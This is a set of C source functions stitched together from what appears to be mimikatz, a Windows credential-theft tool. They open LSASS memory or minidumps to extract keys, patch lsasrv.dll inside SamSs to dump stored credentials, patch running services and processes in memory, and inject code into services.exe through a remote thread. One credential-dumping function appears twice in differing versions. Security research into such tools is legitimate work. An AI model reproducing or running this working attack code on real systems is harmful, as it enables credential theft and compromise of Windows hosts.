NTSTATUS kuhl_m_process_callbackProcess(int argc, wchar_t * argv[], PKULL_M_MODULE_ENUM_CALLBACK callback)
{
HANDLE hProcess = NULL;
DWORD pid = 0;
KULL_M_MEMORY_TYPE type = KULL_M_MEMORY_TYPE_OWN;
PKULL_M_MEMORY_HANDLE hMemoryProcess;
PCWCHAR szPid;
if(kull_m_string_args_byName(argc, argv, L"pid", &szPid, NULL))
{
type = KULL_M_MEMORY_TYPE_PROCESS;
pid = wcstoul(szPid, NULL, 0);
if(!(hProcess = OpenProcess(GENERIC_READ, FALSE, pid)))
PRINT_ERROR_AUTO(L"OpenProcess");
}
if((type == KULL_M_MEMORY_TYPE_OWN) || hProcess)
{
if(kull_m_memory_open(type, hProcess, &hMemoryProcess))
{
kull_m_process_getVeryBasicModuleInformations(hMemoryProcess, callback, NULL);
kull_m_memory_close(hMemoryProcess);
}
else PRINT_ERROR_AUTO(L"kull_m_memory_open");
if(type = KULL_M_MEMORY_TYPE_PROCESS)
CloseHandle(hProcess);
}
return STATUS_SUCCESS;
}
BOOL kull_m_patch_genericProcessOrServiceFromBuild(PKULL_M_PATCH_GENERIC generics, SIZE_T cbGenerics, PCWSTR processOrService, PCWSTR moduleName, BOOL isService) // to do for process // to do callback ! (vault & lsadump)
{
BOOL result = FALSE;
SERVICE_STATUS_PROCESS ServiceStatusProcess;
PKULL_M_MEMORY_HANDLE hMemory;
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
KULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION iModule;
HANDLE hProcess;
KULL_M_MEMORY_ADDRESS
aPatternMemory = {NULL, &hLocalMemory},
aPatchMemory = {NULL, &hLocalMemory};
KULL_M_MEMORY_SEARCH sMemory;
PKULL_M_PATCH_GENERIC currenReferences;
if(currenReferences = kull_m_patch_getGenericFromBuild(generics, cbGenerics, MIMIKATZ_NT_BUILD_NUMBER))
{
aPatternMemory.address = currenReferences->Search.Pattern;
aPatchMemory.address = currenReferences->Patch.Pattern;
if(kull_m_service_getUniqueForName(processOrService, &ServiceStatusProcess))
{
if(ServiceStatusProcess.dwCurrentState >= SERVICE_RUNNING)
{
if(hProcess = OpenProcess(PROCESS_VM_READ | PROCESS_VM_WRITE | PROCESS_VM_OPERATION | PROCESS_QUERY_INFORMATION, FALSE, ServiceStatusProcess.dwProcessId))
{
if(kull_m_memory_open(KULL_M_MEMORY_TYPE_PROCESS, hProcess, &hMemory))
{
if(kull_m_process_getVeryBasicModuleInformationsForName(hMemory, moduleName, &iModule))
{
sMemory.kull_m_memoryRange.kull_m_memoryAdress = iModule.DllBase;
sMemory.kull_m_memoryRange.size = iModule.SizeOfImage;
if(result = kull_m_patch(&sMemory, &aPatternMemory, currenReferences->Search.Length, &aPatchMemory, currenReferences->Patch.Length, currenReferences->Offsets.off0, NULL, 0, NULL, NULL))
kprintf(L"\"%s\" service patched\n", processOrService);
else
PRINT_ERROR_AUTO(L"kull_m_patch");
} else PRINT_ERROR_AUTO(L"kull_m_process_getVeryBasicModuleInformationsForName");
kull_m_memory_close(hMemory);
}
} else PRINT_ERROR_AUTO(L"OpenProcess");
} else PRINT_ERROR(L"Service is not running\n");
} else PRINT_ERROR_AUTO(L"kull_m_service_getUniqueForName");
} else PRINT_ERROR(L"Incorrect version in references\n");
return result;
}
BOOL kuhl_m_misc_generic_nogpo_patch(PCWSTR commandLine, PWSTR disableString, SIZE_T szDisableString, PWSTR enableString, SIZE_T szEnableString)
{
BOOL status = FALSE;
PEB Peb;
PROCESS_INFORMATION processInformation;
PIMAGE_NT_HEADERS pNtHeaders;
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
KULL_M_MEMORY_ADDRESS aBaseAdress = {NULL, NULL}, aPattern = {disableString, &hLocalMemory}, aPatch = {enableString, &hLocalMemory};
KULL_M_MEMORY_SEARCH sMemory;
if(kull_m_process_create(KULL_M_PROCESS_CREATE_NORMAL, commandLine, CREATE_SUSPENDED, NULL, 0, NULL, NULL, NULL, &processInformation, FALSE))
{
if(kull_m_memory_open(KULL_M_MEMORY_TYPE_PROCESS, processInformation.hProcess, &aBaseAdress.hMemory))
{
if(kull_m_process_peb(aBaseAdress.hMemory, &Peb, FALSE))
{
aBaseAdress.address = Peb.ImageBaseAddress;
if(kull_m_process_ntheaders(&aBaseAdress, &pNtHeaders))
{
sMemory.kull_m_memoryRange.kull_m_memoryAdress.hMemory = aBaseAdress.hMemory;
sMemory.kull_m_memoryRange.kull_m_memoryAdress.address = (LPVOID) pNtHeaders->OptionalHeader.ImageBase;
sMemory.kull_m_memoryRange.size = pNtHeaders->OptionalHeader.SizeOfImage;
if(status = kull_m_patch(&sMemory, &aPattern, szDisableString, &aPatch, szEnableString, 0, NULL, 0, NULL, NULL))
kprintf(L"Patch OK for \'%s\' from \'%s\' to \'%s\' @ %p\n", commandLine, disableString, enableString, sMemory.result);
else PRINT_ERROR_AUTO(L"kull_m_patch");
LocalFree(pNtHeaders);
}
}
kull_m_memory_close(aBaseAdress.hMemory);
}
NtResumeProcess(processInformation.hProcess);
CloseHandle(processInformation.hThread);
CloseHandle(processInformation.hProcess);
}
return status;
}
BOOL CALLBACK kuhl_m_misc_detours_callback_process(PSYSTEM_PROCESS_INFORMATION pSystemProcessInformation, PVOID pvArg)
{
HANDLE hProcess;
PKULL_M_MEMORY_HANDLE hMemoryProcess;
DWORD pid = (DWORD) pSystemProcessInformation->UniqueProcessId;
if(pid > 4)
{
kprintf(L"%wZ (%u)\n", &pSystemProcessInformation->ImageName, pid);
if(hProcess = OpenProcess(GENERIC_READ, FALSE, pid))
{
if(kull_m_memory_open(KULL_M_MEMORY_TYPE_PROCESS, hProcess, &hMemoryProcess))
{
kull_m_process_getVeryBasicModuleInformations(hMemoryProcess, kuhl_m_misc_detours_callback_module, NULL);
kull_m_memory_close(hMemoryProcess);
}
CloseHandle(hProcess);
}
else
PRINT_ERROR_AUTO(L"OpenProcess");
}
return TRUE;
}
NTSTATUS kuhl_m_sekurlsa_acquireLSA()
{
NTSTATUS status = STATUS_SUCCESS;
KULL_M_MEMORY_TYPE Type;
HANDLE hData = NULL;
DWORD pid;
PMINIDUMP_SYSTEM_INFO pInfos;
DWORD processRights = PROCESS_VM_READ | PROCESS_QUERY_INFORMATION | PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE;
BOOL isError = FALSE;
if(!cLsass.hLsassMem)
{
status = STATUS_NOT_FOUND;
if(NT_SUCCESS(lsassLocalHelper->initLocalLib()))
{
if(pMinidumpName)
{
Type = KULL_M_MEMORY_TYPE_PROCESS_DMP;
kprintf(L"Opening : \'%s\' file for minidump...\n", pMinidumpName);
hData = CreateFile(pMinidumpName, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL);
}
else
{
Type = KULL_M_MEMORY_TYPE_PROCESS;
if(kull_m_process_getProcessIdForName(L"lsass.exe", &pid))
hData = OpenProcess(processRights, FALSE, pid);
else PRINT_ERROR(L"LSASS process not found (?)\n");
}
if(hData && hData != INVALID_HANDLE_VALUE)
{
if(kull_m_memory_open(Type, hData, &cLsass.hLsassMem))
{
if(Type == KULL_M_MEMORY_TYPE_PROCESS_DMP)
{
if(pInfos = (PMINIDUMP_SYSTEM_INFO) kull_m_minidump_stream(cLsass.hLsassMem->pHandleProcessDmp->hMinidump, SystemInfoStream))
{
cLsass.osContext.MajorVersion = pInfos->MajorVersion;
cLsass.osContext.MinorVersion = pInfos->MinorVersion;
cLsass.osContext.BuildNumber = pInfos->BuildNumber;
if(isError = (cLsass.osContext.MajorVersion != MIMIKATZ_NT_MAJOR_VERSION) && !(MIMIKATZ_NT_MAJOR_VERSION >= 6 && cLsass.osContext.MajorVersion == 10))
PRINT_ERROR(L"Minidump pInfos->MajorVersion (%u) != MIMIKATZ_NT_MAJOR_VERSION (%u)\n", pInfos->MajorVersion, MIMIKATZ_NT_MAJOR_VERSION);
#ifdef _M_X64
else if(isError = (pInfos->ProcessorArchitecture != PROCESSOR_ARCHITECTURE_AMD64))
PRINT_ERROR(L"Minidump pInfos->ProcessorArchitecture (%u) != PROCESSOR_ARCHITECTURE_AMD64 (%u)\n", pInfos->ProcessorArchitecture, PROCESSOR_ARCHITECTURE_AMD64);
#elif defined _M_IX86
else if(isError = (pInfos->ProcessorArchitecture != PROCESSOR_ARCHITECTURE_INTEL))
PRINT_ERROR(L"Minidump pInfos->ProcessorArchitecture (%u) != PROCESSOR_ARCHITECTURE_INTEL (%u)\n", pInfos->ProcessorArchitecture, PROCESSOR_ARCHITECTURE_INTEL);
#endif
}
else
{
isError = TRUE;
PRINT_ERROR(L"Minidump without SystemInfoStream (?)\n");
}
}
else
{
cLsass.osContext.MajorVersion = MIMIKATZ_NT_MAJOR_VERSION;
cLsass.osContext.MinorVersion = MIMIKATZ_NT_MINOR_VERSION;
cLsass.osContext.BuildNumber = MIMIKATZ_NT_BUILD_NUMBER;
}
if(!isError)
{
kuhl_m_sekurlsa_livessp_package.isValid = (cLsass.osContext.BuildNumber >= KULL_M_WIN_MIN_BUILD_8);
kuhl_m_sekurlsa_tspkg_package.isValid = (cLsass.osContext.MajorVersion >= 6) || (cLsass.osContext.MinorVersion < 2);
if(NT_SUCCESS(kull_m_process_getVeryBasicModuleInformations(cLsass.hLsassMem, kuhl_m_sekurlsa_findlibs, NULL)) && kuhl_m_sekurlsa_msv_package.Module.isPresent)
{
kuhl_m_sekurlsa_dpapi_lsa_package.Module = kuhl_m_sekurlsa_msv_package.Module;
if(kuhl_m_sekurlsa_utils_search(&cLsass, &kuhl_m_sekurlsa_msv_package.Module))
{
status = lsassLocalHelper->AcquireKeys(&cLsass, &lsassPackages[0]->Module.Informations);
if(!NT_SUCCESS(status))
PRINT_ERROR(L"Key import\n");
}
else PRINT_ERROR(L"Logon list\n");
}
else PRINT_ERROR(L"Modules informations\n");
}
}
else PRINT_ERROR(L"Memory opening\n");
}
else PRINT_ERROR_AUTO(L"Handle on memory");
if(!NT_SUCCESS(status))
{
cLsass.hLsassMem = kull_m_memory_close(cLsass.hLsassMem);
CloseHandle(hData);
}
}
else PRINT_ERROR(L"Local LSA library failed\n");
}
return status;
}
NTSTATUS kuhl_m_vault_cred(int argc, wchar_t * argv[])
{
DWORD credCount, i;
PCREDENTIAL * pCredential = NULL;
DWORD flags = 0;
UNICODE_STRING creds;
SERVICE_STATUS_PROCESS ServiceStatusProcess;
PKULL_M_MEMORY_HANDLE hMemory;
KULL_M_MEMORY_HANDLE hLocalMemory = { KULL_M_MEMORY_TYPE_OWN, NULL };
KULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION iModuleSamSrv;
HANDLE hSamSs;
KULL_M_MEMORY_ADDRESS aPatternMemory = { NULL, &hLocalMemory }, aPatchMemory = { NULL, &hLocalMemory };
KULL_M_MEMORY_SEARCH sMemory;
PKULL_M_PATCH_GENERIC CredpCloneCredentialReference;
static BOOL isPatching = FALSE;
if (!isPatching && kull_m_string_args_byName(argc, argv, L"patch", NULL, NULL))
{
if (CredpCloneCredentialReference = kull_m_patch_getGenericFromBuild(CredpCloneCredentialReferences, sizeof(CredpCloneCredentialReferences) / sizeof(KULL_M_PATCH_GENERIC), MIMIKATZ_NT_BUILD_NUMBER))
{
aPatternMemory.address = CredpCloneCredentialReference->Search.Pattern;
aPatchMemory.address = CredpCloneCredentialReference->Patch.Pattern;
if (kull_m_service_getUniqueForName(L"SamSs", &ServiceStatusProcess))
{
if (hSamSs = OpenProcess(PROCESS_VM_READ | PROCESS_VM_WRITE | PROCESS_VM_OPERATION | PROCESS_QUERY_INFORMATION, FALSE, ServiceStatusProcess.dwProcessId))
{
if (kull_m_memory_open(KULL_M_MEMORY_TYPE_PROCESS, hSamSs, &hMemory))
{
if (kull_m_process_getVeryBasicModuleInformationsForName(hMemory, L"lsasrv.dll", &iModuleSamSrv))
{
sMemory.kull_m_memoryRange.kull_m_memoryAdress = iModuleSamSrv.DllBase;
sMemory.kull_m_memoryRange.size = iModuleSamSrv.SizeOfImage;
isPatching = TRUE;
if (!kull_m_patch(&sMemory, &aPatternMemory, CredpCloneCredentialReference->Search.Length, &aPatchMemory, CredpCloneCredentialReference->Patch.Length, CredpCloneCredentialReference->Offsets.off0, kuhl_m_vault_cred, argc, argv, NULL))
PRINT_ERROR_AUTO(L"kull_m_patch");
isPatching = FALSE;
}
else PRINT_ERROR_AUTO(L"kull_m_process_getVeryBasicModuleInformationsForName");
kull_m_memory_close(hMemory);
}
}
else PRINT_ERROR_AUTO(L"OpenProcess");
}
else PRINT_ERROR_AUTO(L"kull_m_service_getUniqueForName");
}
}
else
{
do
{
if (CredEnumerate(NULL, flags, &credCount, &pCredential))
{
for (i = 0; i < credCount; i++)
{
kprintf(L"TargetName : %s / %s\n"
L"UserName : %s\n"
L"Comment : %s\n"
L"Type : %u - %s\n"
L"Credential : ",
pCredential[i]->TargetName ? pCredential[i]->TargetName : L"<NULL>", pCredential[i]->TargetAlias ? pCredential[i]->TargetAlias : L"<NULL>",
pCredential[i]->UserName ? pCredential[i]->UserName : L"<NULL>",
pCredential[i]->Comment ? pCredential[i]->Comment : L"<NULL>",
pCredential[i]->Type, (pCredential[i]->Type < CRED_TYPE_MAXIMUM) ? CredTypeToStrings[pCredential[i]->Type] : L"? (type > CRED_TYPE_MAXIMUM)"
);
creds.Buffer = (PWSTR)pCredential[i]->CredentialBlob;
creds.Length = creds.MaximumLength = (USHORT)pCredential[i]->CredentialBlobSize;
if (kull_m_string_suspectUnicodeString(&creds))
kprintf(L"%wZ", &creds);
else
kull_m_string_wprintf_hex(pCredential[i]->CredentialBlob, pCredential[i]->CredentialBlobSize, 1);
kprintf(L"\n\n");
}
CredFree(pCredential);
}
flags++;
} while ((flags <= CRED_ENUMERATE_ALL_CREDENTIALS) && (MIMIKATZ_NT_MAJOR_VERSION > 5));
}
return STATUS_SUCCESS;
}
NTSTATUS kuhl_m_minesweeper_infos(int argc, wchar_t * argv[])
{
DWORD dwPid, r, c;
HANDLE hProcess;
PEB Peb;
PIMAGE_NT_HEADERS pNtHeaders;
PVOID G = NULL;
STRUCT_MINESWEEPER_GAME Game;
STRUCT_MINESWEEPER_BOARD Board;
KULL_M_MEMORY_SEARCH sMemory = {{{NULL, NULL}, 0}, NULL};
KULL_M_MEMORY_ADDRESS aRemote = {NULL, NULL}, aBuffer = {PTRN_WIN6_Game_SafeGetSingleton, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
BOOL bAlloc = FALSE;
LONG offsetTemp = 0;
CHAR ** field = NULL;
if(kull_m_process_getProcessIdForName(L"minesweeper.exe", &dwPid))
{
if(hProcess = OpenProcess(PROCESS_VM_READ | PROCESS_VM_OPERATION | PROCESS_QUERY_INFORMATION, FALSE, dwPid))
{
if(kull_m_memory_open(KULL_M_MEMORY_TYPE_PROCESS, hProcess, &aRemote.hMemory))
{
if(kull_m_process_peb(aRemote.hMemory, &Peb, FALSE))
{
aRemote.address = Peb.ImageBaseAddress;
if(kull_m_process_ntheaders(&aRemote, &pNtHeaders))
{
sMemory.kull_m_memoryRange.kull_m_memoryAdress.hMemory = aRemote.hMemory;
sMemory.kull_m_memoryRange.kull_m_memoryAdress.address = (LPVOID) pNtHeaders->OptionalHeader.ImageBase;
sMemory.kull_m_memoryRange.size = pNtHeaders->OptionalHeader.SizeOfImage;
if(kull_m_memory_search(&aBuffer, sizeof(PTRN_WIN6_Game_SafeGetSingleton), &sMemory, TRUE))
{
aRemote.address = (PBYTE) sMemory.result + OFFS_WIN6_ToG;
#ifdef _M_X64
aBuffer.address = &offsetTemp;
if(kull_m_memory_copy(&aBuffer, &aRemote, sizeof(LONG)))
{
aRemote.address = (PBYTE) aRemote.address + 1 + sizeof(LONG) + offsetTemp;
#elif defined _M_IX86
aBuffer.address = &aRemote.address;
if(kull_m_memory_copy(&aBuffer, &aRemote, sizeof(PVOID)))
{
#endif
aBuffer.address = &G;
if(kull_m_memory_copy(&aBuffer, &aRemote, sizeof(PVOID)))
{
aRemote.address = G;
aBuffer.address = &Game;
if(kull_m_memory_copy(&aBuffer, &aRemote, sizeof(STRUCT_MINESWEEPER_GAME)))
{
#ifdef _M_IX86
if(MIMIKATZ_NT_BUILD_NUMBER >= KULL_M_WIN_MIN_BUILD_7)
Game.pBoard = Game.pBoard_WIN7x86;
#endif
aRemote.address = Game.pBoard;
aBuffer.address = &Board;
if(kull_m_memory_copy(&aBuffer, &aRemote, sizeof(STRUCT_MINESWEEPER_BOARD)))
{
kprintf(L"Field : %u r x %u c\nMines : %u\n\n", Board.cbRows, Board.cbColumns, Board.cbMines);
if(field = (CHAR **) LocalAlloc(LPTR, sizeof(CHAR *) * Board.cbRows))
{
for(r = 0, bAlloc = TRUE; (r < Board.cbRows) && bAlloc; r++)
{
if(field[r] = (CHAR *) LocalAlloc(LPTR, sizeof(CHAR) * Board.cbColumns))
bAlloc &= TRUE;
else PRINT_ERROR(L"Memory C (R = %u)\n", r);
}
}
else PRINT_ERROR(L"Memory R\n");
if(bAlloc)
{
kuhl_m_minesweeper_infos_parseField(aRemote.hMemory, Board.ref_visibles, field, TRUE);
kuhl_m_minesweeper_infos_parseField(aRemote.hMemory, Board.ref_mines, field, FALSE);
for(r = 0; r < Board.cbRows; r++)
{
kprintf(L"\t");
for(c = 0; c < Board.cbColumns; c++)
kprintf(L"%C ", field[r][c]);
kprintf(L"\n");
}
}
if(field)
{
for(r = 0; r < Board.cbRows; r++)
{
if(field[r])
LocalFree(field[r]);
}
LocalFree(field);
}
}
else PRINT_ERROR(L"Board copy\n");
}
else PRINT_ERROR(L"Game copy\n");
}
else PRINT_ERROR(L"G copy\n");
}
else PRINT_ERROR(L"Global copy\n");
}
else PRINT_ERROR(L"Search is KO\n");
LocalFree(pNtHeaders);
}
else PRINT_ERROR(L"Minesweeper NT Headers\n");
}
else PRINT_ERROR(L"Minesweeper PEB\n");
kull_m_memory_close(aRemote.hMemory);
}
CloseHandle(hProcess);
}
else PRINT_ERROR_AUTO(L"OpenProcess");
}
else PRINT_ERROR(L"No MineSweeper in memory!\n");
return STATUS_SUCCESS;
}
void kuhl_m_minesweeper_infos_parseField(PKULL_M_MEMORY_HANDLE hMemory, PSTRUCT_MINESWEEPER_REF_ELEMENT base, CHAR ** field, BOOL isVisible)
{
STRUCT_MINESWEEPER_REF_ELEMENT ref_first_element;
PSTRUCT_MINESWEEPER_REF_ELEMENT * ref_columns_elements;
STRUCT_MINESWEEPER_REF_ELEMENT ref_column_element;
DWORD c, r, szFinalElement = isVisible ? sizeof(DWORD) : sizeof(BYTE);
KULL_M_MEMORY_ADDRESS aRemote = {base, hMemory}, aLocal = {&ref_first_element, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
if(kull_m_memory_copy(&aLocal, &aRemote, sizeof(STRUCT_MINESWEEPER_REF_ELEMENT)))
{
if(ref_columns_elements = (PSTRUCT_MINESWEEPER_REF_ELEMENT *) LocalAlloc(LPTR, sizeof(PSTRUCT_MINESWEEPER_REF_ELEMENT) * ref_first_element.cbElements))
{
aLocal.address = ref_columns_elements;
aRemote.address = ref_first_element.elements;
if(kull_m_memory_copy(&aLocal, &aRemote, ref_first_element.cbElements * sizeof(PSTRUCT_MINESWEEPER_REF_ELEMENT)))
{
for(c = 0; c < ref_first_element.cbElements; c++)
{
aLocal.address = &ref_column_element;
aRemote.address = ref_columns_elements[c];
if(kull_m_memory_copy(&aLocal, &aRemote, sizeof(STRUCT_MINESWEEPER_REF_ELEMENT)))
{
if(aLocal.address = LocalAlloc(LPTR, szFinalElement * ref_column_element.cbElements))
{
aRemote.address = ref_column_element.elements;
if(kull_m_memory_copy(&aLocal, &aRemote, szFinalElement * ref_column_element.cbElements))
{
for(r = 0; r < ref_column_element.cbElements; r++)
{
if(isVisible)
field[r][c] = DISP_MINESWEEPER[((DWORD *)(aLocal.address))[r]];
else if(((BYTE *)(aLocal.address))[r])
field[r][c] = '*';
}
}
else PRINT_ERROR(L"Unable to read elements from column: %u\n", c);
LocalFree(aLocal.address);
}
}
else PRINT_ERROR(L"Unable to read references from column: %u\n", c);
}
}
else PRINT_ERROR(L"Unable to read references\n");
LocalFree(ref_columns_elements);
}
}
else PRINT_ERROR(L"Unable to read first element\n");
}
NTSTATUS kuhl_m_vault_cred(int argc, wchar_t * argv[])
{
DWORD credCount, i, j;
PCREDENTIAL * pCredential = NULL;
DWORD flags = 0;
SERVICE_STATUS_PROCESS ServiceStatusProcess;
PKULL_M_MEMORY_HANDLE hMemory;
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
KULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION iModuleSamSrv;
HANDLE hSamSs;
KULL_M_MEMORY_ADDRESS aPatternMemory = {NULL, &hLocalMemory}, aPatchMemory = {NULL, &hLocalMemory};
KULL_M_MEMORY_SEARCH sMemory;
PKULL_M_PATCH_GENERIC CredpCloneCredentialReference;
static BOOL isPatching = FALSE;
if(!isPatching && kull_m_string_args_byName(argc, argv, L"patch", NULL, NULL))
{
if(CredpCloneCredentialReference = kull_m_patch_getGenericFromBuild(CredpCloneCredentialReferences, ARRAYSIZE(CredpCloneCredentialReferences), MIMIKATZ_NT_BUILD_NUMBER))
{
aPatternMemory.address = CredpCloneCredentialReference->Search.Pattern;
aPatchMemory.address = CredpCloneCredentialReference->Patch.Pattern;
if(kull_m_service_getUniqueForName(L"SamSs", &ServiceStatusProcess))
{
if(hSamSs = OpenProcess(PROCESS_VM_READ | PROCESS_VM_WRITE | PROCESS_VM_OPERATION | PROCESS_QUERY_INFORMATION, FALSE, ServiceStatusProcess.dwProcessId))
{
if(kull_m_memory_open(KULL_M_MEMORY_TYPE_PROCESS, hSamSs, &hMemory))
{
if(kull_m_process_getVeryBasicModuleInformationsForName(hMemory, L"lsasrv.dll", &iModuleSamSrv))
{
sMemory.kull_m_memoryRange.kull_m_memoryAdress = iModuleSamSrv.DllBase;
sMemory.kull_m_memoryRange.size = iModuleSamSrv.SizeOfImage;
isPatching = TRUE;
if(!kull_m_patch(&sMemory, &aPatternMemory, CredpCloneCredentialReference->Search.Length, &aPatchMemory, CredpCloneCredentialReference->Patch.Length, CredpCloneCredentialReference->Offsets.off0, kuhl_m_vault_cred, argc, argv, NULL))
PRINT_ERROR_AUTO(L"kull_m_patch");
isPatching = FALSE;
} else PRINT_ERROR_AUTO(L"kull_m_process_getVeryBasicModuleInformationsForName");
kull_m_memory_close(hMemory);
}
} else PRINT_ERROR_AUTO(L"OpenProcess");
} else PRINT_ERROR_AUTO(L"kull_m_service_getUniqueForName");
}
}
else
{
do
{
if(CredEnumerate(NULL, flags, &credCount, &pCredential))
{
for(i = 0; i < credCount; i++)
{
kprintf(L"TargetName : %s / %s\n"
L"UserName : %s\n"
L"Comment : %s\n"
L"Type : %u - %s\n"
L"Persist : %u - %s\n"
L"Flags : %08x\n",
pCredential[i]->TargetName ? pCredential[i]->TargetName : L"<NULL>", pCredential[i]->TargetAlias ? pCredential[i]->TargetAlias : L"<NULL>",
pCredential[i]->UserName ? pCredential[i]->UserName : L"<NULL>",
pCredential[i]->Comment ? pCredential[i]->Comment : L"<NULL>",
pCredential[i]->Type, kull_m_cred_CredType(pCredential[i]->Type),
pCredential[i]->Persist, kull_m_cred_CredPersist(pCredential[i]->Persist),
pCredential[i]->Flags
);
kprintf(L"Credential : ");
kull_m_string_printSuspectUnicodeString(pCredential[i]->CredentialBlob, pCredential[i]->CredentialBlobSize);
kprintf(L"\n"
L"Attributes : %u\n", pCredential[i]->AttributeCount
);
if(kull_m_string_args_byName(argc, argv, L"attributes", NULL, NULL))
{
for(j = 0; j < pCredential[i]->AttributeCount; j++)
{
kprintf(L" [%2u] Attribute\n", j);
kprintf(L" Flags : %08x - %u\n", pCredential[i]->Attributes[j].Flags, pCredential[i]->Attributes[j].Flags);
kprintf(L" Keyword : %s\n", pCredential[i]->Attributes[j].Keyword);
kprintf(L" Value : ");
kull_m_string_printSuspectUnicodeString(pCredential[i]->Attributes[j].Value, pCredential[i]->Attributes[j].ValueSize);
kprintf(L"\n");
}
}
kprintf(L"\n");
}
CredFree(pCredential);
}
flags++;
} while((flags <= CRED_ENUMERATE_ALL_CREDENTIALS) && (MIMIKATZ_NT_MAJOR_VERSION > 5));
}
return STATUS_SUCCESS;
}
BOOL kuhl_service_sendcontrol_inprocess(PWSTR ServiceName, DWORD dwControl)
{
BOOL status = FALSE;
DWORD processId, szCode;
PVOID pCode;
HANDLE hProcess;
KULL_M_MEMORY_ADDRESS aRemoteFunc;
KULL_M_MEMORY_ADDRESS aLocalMemory = {NULL, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
KULL_M_MEMORY_SEARCH sMemory;
PKULL_M_PATCH_GENERIC currentReference;
PEB Peb;
PIMAGE_NT_HEADERS pNtHeaders;
PREMOTE_LIB_INPUT_DATA iData;
REMOTE_LIB_OUTPUT_DATA oData;
if(kull_m_process_getProcessIdForName(L"services.exe", &processId))
{
if(hProcess = OpenProcess(PROCESS_VM_READ | PROCESS_VM_WRITE | PROCESS_VM_OPERATION | PROCESS_QUERY_INFORMATION | PROCESS_CREATE_THREAD, FALSE, processId))
{
if(kull_m_memory_open(KULL_M_MEMORY_TYPE_PROCESS, hProcess, &sMemory.kull_m_memoryRange.kull_m_memoryAdress.hMemory))
{
if(!pScSendControl)
{
if(kull_m_process_peb(sMemory.kull_m_memoryRange.kull_m_memoryAdress.hMemory, &Peb, FALSE))
{
sMemory.kull_m_memoryRange.kull_m_memoryAdress.address = Peb.ImageBaseAddress;
if(kull_m_process_ntheaders(&sMemory.kull_m_memoryRange.kull_m_memoryAdress, &pNtHeaders))
{
sMemory.kull_m_memoryRange.kull_m_memoryAdress.address = (LPVOID) pNtHeaders->OptionalHeader.ImageBase;
sMemory.kull_m_memoryRange.size = pNtHeaders->OptionalHeader.SizeOfImage;
if(currentReference = kull_m_patch_getGenericFromBuild(ScSendControlReferences, ARRAYSIZE(ScSendControlReferences), MIMIKATZ_NT_BUILD_NUMBER))
{
aLocalMemory.address = currentReference->Search.Pattern;
if(kull_m_memory_search(&aLocalMemory, currentReference->Search.Length, &sMemory, FALSE))
pScSendControl = (PBYTE) sMemory.result + currentReference->Offsets.off0;
else PRINT_ERROR_AUTO(L"kull_m_memory_search");
}
LocalFree(pNtHeaders);
}
}
}
if(pScSendControl)
{
if(MIMIKATZ_NT_BUILD_NUMBER < KULL_M_WIN_BUILD_8)
{
szCode = (DWORD) ((PBYTE) kuhl_service_sendcontrol_std_thread_end - (PBYTE) kuhl_service_sendcontrol_std_thread);
pCode = kuhl_service_sendcontrol_std_thread;
}
else
{
szCode = (DWORD) ((PBYTE) kuhl_service_sendcontrol_fast_thread_end - (PBYTE) kuhl_service_sendcontrol_fast_thread);
pCode = kuhl_service_sendcontrol_fast_thread;
}
if(kull_m_remotelib_CreateRemoteCodeWitthPatternReplace(sMemory.kull_m_memoryRange.kull_m_memoryAdress.hMemory, pCode, szCode, NULL, &aRemoteFunc))
{
if(iData = kull_m_remotelib_CreateInput(pScSendControl, dwControl, (DWORD) (wcslen(ServiceName) + 1) * sizeof(wchar_t), ServiceName))
{
if(kull_m_remotelib_create(&aRemoteFunc, iData, &oData))
{
if(oData.outputStatus)
kprintf(L"error %u\n", oData.outputStatus);
else
kprintf(L"OK!\n");
}
else PRINT_ERROR_AUTO(L"kull_m_remotelib_create");
LocalFree(iData);
}
kull_m_memory_free(&aRemoteFunc, 0);
}
else PRINT_ERROR(L"kull_m_remotelib_CreateRemoteCodeWitthPatternReplace\n");
}
else PRINT_ERROR(L"Not available without ScSendControl\n");
kull_m_memory_close(sMemory.kull_m_memoryRange.kull_m_memoryAdress.hMemory);
}
CloseHandle(hProcess);
}
else PRINT_ERROR_AUTO(L"OpenProcess");
}
return status;
}
